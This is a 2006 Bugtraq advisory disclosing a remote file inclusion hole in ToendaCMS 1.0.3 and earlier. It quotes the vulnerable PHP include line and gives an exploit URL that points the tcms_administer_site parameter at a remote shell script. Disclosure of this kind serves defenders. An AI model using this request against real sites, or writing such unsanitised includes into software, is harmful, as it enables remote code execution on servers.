
Date: 20 Aug 2006 07:52:31 -0000
From: h4ck3riran@...oo.com
To: bugtraq@...urityfocus.com
Subject: ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include

>****************************************************
>                Iranians Are The Bests
>
>****************************************************
> ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include
>Descriptions
># Script.............. : ToendaCMS
># Discovered By.... : You_You
># Risk : High 
># Class..............  : Remote
># Special Thanx To All Aria-Security's Administrators
>
> 
-----------------------------------------------------------------------------------
>
>Source : 
> include($tcms_administer_site.'/tcms_global/database.php')
>
>
>Exploit :
> http://www.site.com/path/tcms_administer_site=SHELL
